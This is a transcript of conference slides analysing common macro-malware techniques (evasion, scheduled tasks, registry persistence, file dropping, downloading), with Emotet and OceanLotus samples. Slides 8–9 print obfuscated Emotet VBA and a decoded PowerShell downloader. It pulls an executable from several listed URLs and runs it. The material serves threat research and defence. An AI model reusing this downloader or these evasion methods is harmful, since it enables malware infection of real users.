SlideShare a Scribd company logo

Macro malware common techniques - public

Security Bootcamp
Security Bootcamp

Kienmanowar - Macro malware common techniques - public

Technology
1 of 66
Download to read offline
Macro malware – Common Techniques <m4n0w4r> 9/16/2019 Macro malware - common techniques 1
#Wh0_4m_1? 1. @kienmanowar/@m4n0w4r 2. Twitter: @kienbigmummy 3. Company: 4. Blog: kienmanowar.wordpress.com 5. Writer for tradahacking.vn 9/16/2019 Macro malware - common techniques 2
Agenda • Typical Method • Evading Parent/Child Analysis • Scheduled Task Creation • Registry Modification • Dropping Files • Download File 9/16/2019 Macro malware - common techniques 3
Cyber Kill Chain Model by Lockheed Martin (Intelligence-Driven Computer Network Defense) 9/16/2019 Macro malware - common techniques 4
The Typical Method 9/16/2019 Macro malware - common techniques 5
Emotet variant 9/16/2019 Macro malware - common techniques 6 https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
VBA code 9/16/2019 Macro malware - common techniques 7
Code from VBA Modules VBA.Shell$ iphSIiNfaNjTt, 0 Function iphSIiNfaNjTt() iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL Function aPNnoXoRGKMH() aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi Sub AutoOpen() Function TiaBlsUalNnM() TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + hnTWVhb + ZOrnliBU 9/16/2019 Macro malware - common techniques 8
Decoded VBA call to obfuscated powershell cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd = Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9 Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i 4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B- i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk 9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas = '+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1, k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas + H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4 Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke- k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i 4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7 8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+ ')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) - cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 - cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe ([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X') 9/16/2019 Macro malware - common techniques 9
9/16/2019 Macro malware - common techniques 10
Decoded powershell 9/16/2019 Macro malware - common techniques 11
Evading Parent/Child Analysis 9/16/2019 Macro malware - common techniques 12
• This behavior is relatively anomalous and can easily be detected by most modern blue-teams. 9/16/2019 Macro malware - common techniques 13
Spawning via WmiPrvse.exe using wmi https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • New process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is below: 9/16/2019 Macro malware - common techniques 14
Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw) 9/16/2019 Macro malware - common techniques 15
Spawning via ShellCOM • Sample code using ShellBrowserWindow : https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html 9/16/2019 Macro malware - common techniques 16
Spawning via ShellCOM • Sample code using ShellWindows : 9/16/2019 Macro malware - common techniques 17
Parent PID Spoofing with CreateProcessA • The API call CreateProcessA supports a parameter called “lpStartupInfo” where you can essentially define the parent process you want to use. – lpStartupInfo parameter points to a STARTUPINFOEX structure 9/16/2019 Macro malware - common techniques 18
Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/ 9/16/2019 Macro malware - common techniques 19
1st stage VBA Code 9/16/2019 Macro malware - common techniques 20
Decoded base64 String 9/16/2019 Macro malware - common techniques 21
2nd VBA code (1) 9/16/2019 Macro malware - common techniques 22
dllhost.exe run as child of explorer.exe 9/16/2019 Macro malware - common techniques 23
2nd VBA code (2) 9/16/2019 Macro malware - common techniques 24
Scheduled Task Creation 9/16/2019 Macro malware - common techniques 25
• VBScript supports us create Scheduled Tasks, which can be abused to not only related to activity from Office (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger- example--scripting- 9/16/2019 Macro malware - common techniques 26
Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 9/16/2019 Macro malware - common techniques 27
Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 28
Sub Document_Open() 9/16/2019 Macro malware - common techniques 29
Sub Document_Close() 9/16/2019 Macro malware - common techniques 30
A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 9/16/2019 Macro malware - common techniques 31
9/16/2019 Macro malware - common techniques 32
9/16/2019 Macro malware - common techniques 33
9/16/2019 Macro malware - common techniques 34
9/16/2019 Macro malware - common techniques 35
Registry Modification 9/16/2019 Macro malware - common techniques 36
• VBScript also allows access to the registry - allowing the storing of payloads, modification of settings, and creation of persistence entries directly from a macro (using WMI or WScript) – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks-- registry 9/16/2019 Macro malware - common techniques 37
Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e0249/16/2019 Macro malware - common techniques 38 https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 39
9/16/2019 Macro malware - common techniques 40
Write 1st decoded base64 to "C:ProgramDataWindowsDefender.ini" 9/16/2019 Macro malware - common techniques 45
Write 2nd decoded base64 to "C:ProgramDataDefender.sct" 9/16/2019 Macro malware - common techniques 46
Write 3rd decoded base64 to "C:ProgramDataDefenderService.inf" 9/16/2019 Macro malware - common techniques 47
LoL_Bin (Living Off The Land) 9/16/2019 Macro malware - common techniques 48
9/16/2019 Macro malware - common techniques 49
Another #OceanLotus sample 9/16/2019 Macro malware - common techniques 50 https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
VBA code 9/16/2019 Macro malware - common techniques 51
Dropping Files 9/16/2019 Macro malware - common techniques 52
• Dropping files has its pros and cons. Making changes to disk can often mean payloads are analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk due to the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files. 9/16/2019 Macro malware - common techniques 53
Again another sample of #OceanLotus…. 9/16/2019 Macro malware - common techniques 54 https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
VBA code… 9/16/2019 Macro malware - common techniques 55
Dropping dll file 9/16/2019 Macro malware - common techniques 56
Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 9/16/2019 Macro malware - common techniques 57 https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
VBA Code – Get Base64 data 9/16/2019 Macro malware - common techniques 58
VBA Code – Decode b64 and execute payload 9/16/2019 Macro malware - common techniques 59
Download file 9/16/2019 Macro malware - common techniques 60
• There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to output to file. • Another option would be to use a direct API call, for example a simple VBScript download cradle can be implemented using URLDownloadToFileA. 9/16/2019 Macro malware - common techniques 61
Some sample code 9/16/2019 Macro malware - common techniques 62
Sample https://www.virustotal.com/gui/file/e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5 9/16/2019 Macro malware - common techniques 63
Extract out VBA code 9/16/2019 Macro malware - common techniques 64
Extract out VBA code 9/16/2019 Macro malware - common techniques 65
9/16/2019 Macro malware - common techniques 66
Other sample https://www.virustotal.com/gui/file/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd 9/16/2019 Macro malware - common techniques 67
VBA Code 9/16/2019 Macro malware - common techniques 68
9/16/2019 Macro malware - common techniques 69
End! 9/16/2019 Macro malware - common techniques 70

Recommended

Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014Christian Heilmann
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdfssuser785ce21
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Mahmoud Hatem
 
AMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringAMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringMelvin Zhang
 
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)erowe3
 
Open source drones_in_everyday_life
Open source drones_in_everyday_lifeOpen source drones_in_everyday_life
Open source drones_in_everyday_lifeYoon Chun Nicholas Ng
 
Is it us or them (third parties)
Is it us or them (third parties)Is it us or them (third parties)
Is it us or them (third parties)Dave Whyte
 

Recommended

Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014What if everything is awesome? Codemotion Madrid 2014
What if everything is awesome? Codemotion Madrid 2014Christian Heilmann
 
oracleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdforacleeventshunting-190909105308.pdf
oracleeventshunting-190909105308.pdfssuser785ce21
 
Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Oracle events hunting [POUG19]
Oracle events hunting [POUG19]Mahmoud Hatem
 
AMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringAMKSS Career Conference 2018: Software Engineering
AMKSS Career Conference 2018: Software EngineeringMelvin Zhang
 
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)Cis1-193-Rowe-Erin-exam 2 b(handson-lab)
Cis1-193-Rowe-Erin-exam 2 b(handson-lab)erowe3
 
Open source drones_in_everyday_life
Open source drones_in_everyday_lifeOpen source drones_in_everyday_life
Open source drones_in_everyday_lifeYoon Chun Nicholas Ng
 
Is it us or them (third parties)
Is it us or them (third parties)Is it us or them (third parties)
Is it us or them (third parties)Dave Whyte
 
6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdfEMERSON EDUARDO RODRIGUES
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Dariush Nasirpour
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業AI.academy
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Scilab
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicUlf Mattsson
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPFAdam Compton
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...►David Clarke FBCS CITP
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magikJairoACS
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGMatthew McCullough
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer vilss
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology InnovationsImesh Gunaratne
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)Druva
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET Journal
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerKyungmin Lee
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarISSA LA
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Tzung-Bi Shih
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1ecommerce poland expo
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolKoan-Sin Tan
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdfdino715195
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot EdgeRiccardo Zamana
 
Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 

More Related Content

Similar to Macro malware common techniques - public

6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdfEMERSON EDUARDO RODRIGUES
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Dariush Nasirpour
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業AI.academy
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Scilab
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicUlf Mattsson
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...►David Clarke FBCS CITP
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magikJairoACS
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGMatthew McCullough
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer vilss
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology InnovationsImesh Gunaratne
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)Druva
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET Journal
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerKyungmin Lee
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarISSA LA
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Tzung-Bi Shih
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1ecommerce poland expo
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolKoan-Sin Tan
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdfdino715195
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot EdgeRiccardo Zamana
 

Similar to Macro malware common techniques - public (20)

6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf6- Siemens Open Library - PID Configuration.pdf
6- Siemens Open Library - PID Configuration.pdf
 
Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)Threat Report: Sys32.exe Trojan.Generic (Turkish)
Threat Report: Sys32.exe Trojan.Generic (Turkish)
 
台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業台灣人工智慧學校台中分校第二期結業
台灣人工智慧學校台中分校第二期結業
 
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
Faster Time to Market using Scilab/XCOS/X2C for motor control algorithm devel...
 
Data Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus PandemicData Protection & Privacy During the Coronavirus Pandemic
Data Protection & Privacy During the Coronavirus Pandemic
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPF
 
Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...Free or low cost data cyber and data protection technologies for home remot...
Free or low cost data cyber and data protection technologies for home remot...
 
Camaras black magik
Camaras black magikCamaras black magik
Camaras black magik
 
Build Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUGBuild Lifecycle Craftsmanship for the Transylvania JUG
Build Lifecycle Craftsmanship for the Transylvania JUG
 
Packet Sniffer
Packet Sniffer Packet Sniffer
Packet Sniffer
 
Making a Better World with Technology Innovations
Making a Better World with Technology InnovationsMaking a Better World with Technology Innovations
Making a Better World with Technology Innovations
 
How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)How Endpoint Mobility Kills Bare Metal Restore (infographic)
How Endpoint Mobility Kills Bare Metal Restore (infographic)
 
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and BlockingIRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
IRJET- Browser Extension for Cryptojacking Malware Detection and Blocking
 
Automated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracerAutomated Historical Performance Analysis with kmemtracer
Automated Historical Performance Analysis with kmemtracer
 
Emerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovarEmerging tech track kovar-david-forensics-kovar
Emerging tech track kovar-david-forensics-kovar
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
 
Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1Stefan Marsiske - What would hackers use? part1
Stefan Marsiske - What would hackers use? part1
 
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source ToolExploring Thermal Related Stuff in iDevices using Open-Source Tool
Exploring Thermal Related Stuff in iDevices using Open-Source Tool
 
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
2019-12-11-OWASP-IoT-Top-10---Introduction-and-Root-Causes.pdf
 
Azure Industrial Iot Edge
Azure Industrial Iot EdgeAzure Industrial Iot Edge
Azure Industrial Iot Edge
 

More from Security Bootcamp

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfSecurity Bootcamp
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecuritySecurity Bootcamp
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewSecurity Bootcamp
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
